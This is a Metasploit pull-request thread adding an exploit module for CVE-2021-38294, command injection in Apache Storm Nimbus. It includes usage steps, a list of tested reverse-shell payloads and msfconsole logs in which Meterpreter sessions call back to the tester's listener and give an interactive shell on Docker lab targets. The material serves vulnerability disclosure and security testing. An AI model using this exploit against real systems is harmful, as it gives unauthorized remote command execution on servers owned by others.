Add Exploit For CVE-2021-38294 (Apache Storm Nimbus getTopologyHistory RCE)
rapid7/metasploit-framework pull request #15866
Opened 2021-11-12 20:26 UTC by zeroSteiner

This adds an exploit for CVE-2021-38294 which is an unauthenticated remote command execution vulnerability within the `getTopologyHistory` RPC method that is provided by the Nimbus service which is a component of the Apache Storm project. **In order to be exploitable, at least one topology must have been submitted to the Storm cluster. It may be active or inactve but one must be present.** The steps detailed in the module docs include submitting a topology for testing purposes. Successful exploitation results in OS command execution as the user that started the Nimbus service.

This also includes a very minimal implementation of the [apache/thrift](https://github.com/apache/thrift) protocol which is what Nimbus runs on. Nimbus uses a "buffered" variant that is basically all of the Thrift frames prefixed with a uint32 integer representing the size of all of the thrift data.

## Verification

List the steps needed to make sure this thing works

- [ ] Setup a vulnerable Storm cluster (detailed steps and copy-pastable instructions are in the module docs, a Apache Storm Starter jar file is required though).
- [ ] Start `msfconsole`
- [ ] Do: `exploit/linux/misc/nimbus_gettopologyhistory_cmd_exec`
- [ ] Set the module options
- [ ] Do: `exploit`
- [ ] You should get a shell

The following payloads were successfully tested in the example docker environment:
* linux/x64/meterpreter/reverse_tcp
* cmd/unix/reverse_python
  * For some reason, the session opened message is not displayed, but the session works as expected
* cmd/unix/generic
* cmd/unix/reverse_openssl

## Example

```
msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > set TARGET  1
TARGET => 1
msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > set PAYLOAD  linux/x64/meterpreter/reverse_tcp 
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > check
[*] 192.168.159.31:6627 - The target appears to be vulnerable. Successfully tested command injection.
msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.31:6627 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.159.31:6627 - The target appears to be vulnerable. Successfully tested command injection.
[*] 192.168.159.31:6627 - Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Sending stage (3012548 bytes) to 192.168.159.31
[*] 192.168.159.31:6627 - Command Stager progress - 100.00% done (823/823 bytes)
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.31:51680 ) at 2021-11-12 14:45:37 -0500
meterpreter > getuid
Server username: storm
meterpreter > sysinfo
Computer     : 172.17.0.3
OS           : Debian 11.1 (Linux 5.4.0-89-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

2021-11-15 14:31 UTC, zeroSteiner commented
Tests are failing because of the new rex requirements.

2021-11-15 22:07 UTC, gwillcox-r7 commented
For passerbys, this PR is blocked on https://github.com/rapid7/rex-core/pull/17 as a requirement. Going to put this in draft state until that is landed to reflect the state properly.

2021-11-17 23:09 UTC, gwillcox-r7 requested changes

2021-11-17 23:27 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/misc/nimbus_gettopologyhistory_cmd_exec.md
> +The getTopologyHistory RPC method method takes a single argument which is the name of a user which is
Fixed in https://github.com/rapid7/metasploit-framework/pull/15866/commits/a915c3ce5c338a95782ce0ac9aa491f3b35bab98

2021-11-17 23:27 UTC, gwillcox-r7 commented on modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
> +          This module exploits a command injection vulnerability within the Nimbus service component of Apache Storm.
Fixed in https://github.com/rapid7/metasploit-framework/pull/15866/commits/a915c3ce5c338a95782ce0ac9aa491f3b35bab98

2021-11-17 23:27 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/misc/nimbus_gettopologyhistory_cmd_exec.md
> +This module exploits a command injection vulnerability within the Nimbus service component of Apache Storm.
Fixed in https://github.com/rapid7/metasploit-framework/pull/15866/commits/a915c3ce5c338a95782ce0ac9aa491f3b35bab98

2021-11-17 23:28 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/misc/nimbus_gettopologyhistory_cmd_exec.md
> +least one must be present.
Fixed in https://github.com/rapid7/metasploit-framework/pull/15866/commits/a915c3ce5c338a95782ce0ac9aa491f3b35bab98, however leaving this open in case I made an incorrect evaluation here. Basing this on the fact that output showed it being a user other than `root` when we exploit the Docker image.

2021-11-17 23:28 UTC, gwillcox-r7 commented on modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
> +          least one must be present.
Fixed in https://github.com/rapid7/metasploit-framework/pull/15866/commits/a915c3ce5c338a95782ce0ac9aa491f3b35bab98, however leaving this open in case I made an incorrect evaluation here. Basing this on the fact that output showed it being a user other than `root` when we exploit the Docker image.

2021-11-17 23:28 UTC, gwillcox-r7 commented on modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
> +        'Name' => 'Apache Storm Nimbus getTopologyHistory Command Execution',
Fixed in https://github.com/rapid7/metasploit-framework/pull/15866/commits/a915c3ce5c338a95782ce0ac9aa491f3b35bab98

2021-11-17 23:30 UTC, gwillcox-r7 commented
Attempted to fix some of these issues however in the interest of making sure we are both on the same page first I haven't changed everything just yet. Let me know if these changes make sense and if so I can go ahead and make them so long to save you some time.

2021-11-18 15:25 UTC, jmartin-r7 commented on modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
> +    end
@smcintyre-r7's own review thought!
```suggestion     
    res = sock.timed_read(res_size.unpack1('N'), remaining)
```

2021-11-18 21:30 UTC, zeroSteiner commented on modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
> +          'MeterpreterTryToFork' => true
The Nimbus server will wait until the command that's executed returns before it's able to send the response. This option ensures that's the case when Meterpreter is used, allowing the server to respond cleanly because the command exists after it's forked itself. Other payloads will work but if they run forever the server won't respond.

2021-11-18 22:34 UTC, gwillcox-r7 commented on modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
> +          'MeterpreterTryToFork' => true
Nice makes sense, thanks for explaining that!

2021-11-18 22:35 UTC, gwillcox-r7 approved these changes

2021-11-18 22:36 UTC, gwillcox-r7 commented
Changes look good, beginning testing now.

2021-11-18 22:54 UTC, gwillcox-r7 commented
Works like a charm, nice work!

```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/linux/misc/nimbus_gettopologyhistory_cmd_exec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > show options

Module options (exploit/linux/misc/nimbus_gettopologyhistory_cmd_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/
                                       metasploit-framework/wiki/Using-Metasploit
   RPORT    6627             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on.
                                       This must be an address on the local machine or 0.
                                       0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is rando
                                       mly generated)
   URIPATH                   no        The URI to use for this exploit (default is random
                                       )


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.19.30.63     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > set LHOST docker 0
LHOST => docker 0
msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > set LHOST docker0
LHOST => docker0
msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > check
[*] 127.0.0.1:6627 - The target appears to be vulnerable. Successfully tested command injection.
msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > exploit

[-] Handler failed to bind to 172.18.0.1:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] 127.0.0.1:6627 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > set LPORT 6677
LPORT => 6677
msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > exploit

[*] Started reverse TCP handler on 172.18.0.1:6677 
[*] 127.0.0.1:6627 - Running automatic check ("set AutoCheck false" to disable)
[+] 127.0.0.1:6627 - The target appears to be vulnerable. Successfully tested command injection.
[*] 127.0.0.1:6627 - Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Sending stage (3012548 bytes) to 172.18.0.3
[*] 127.0.0.1:6627 - Command Stager progress - 100.00% done (823/823 bytes)
[*] Meterpreter session 1 opened (172.18.0.1:6677 -> 172.18.0.3:48300 ) at 2021-11-18 16:53:40 -0600

meterpreter > getuid
Server username: storm
meterpreter > getprivs
[-] The "getprivs" command is not supported by this Meterpreter type (x64/linux)
meterpreter > shell -it
[*] env TERM=xterm HISTFILE= /usr/bin/script -qc /bin/bash /dev/null
Process 287 created.
Channel 1 created.
storm@2cc02bbcbf5a:/apache-storm-2.2.0$ ls
ls
DEPENDENCY-LICENSES  RELEASE	  examples	 lib	     licenses
LICENSE		     SECURITY.md  external	 lib-tools   log4j2
NOTICE		     bin	  extlib	 lib-webapp  public
README.markdown      conf	  extlib-daemon  lib-worker  storm_rocks
storm@2cc02bbcbf5a:/apache-storm-2.2.0$ uname -a
uname -a
Linux 2cc02bbcbf5a 5.11.0-40-generic #44-Ubuntu SMP Wed Oct 20 16:16:42 UTC 2021 x86_64 GNU/Linux
storm@2cc02bbcbf5a:/apache-storm-2.2.0$ 
```

2021-11-18 23:03 UTC, merged

2021-11-18 23:03 UTC, gwillcox-r7 commented
Commit 725c5f8d8cc42448caf6ef5d21da3b50a398b524 will add in minor missing `use` part of one of the commands in documentation and adds in an additional scenario since the one documented didn't match the one I tested 100%.

2021-11-18 23:10 UTC, gwillcox-r7 commented
# Release Notes
This adds an exploit for CVE-2021-38294 which is an unauthenticated remote command execution vulnerability within the `getTopologyHistory()` RPC method that is provided by the Nimbus service which is a component of the Apache Storm project. In order to be exploitable, at least one topology must have been submitted to the Storm cluster. It may be active or inactive but one must be present.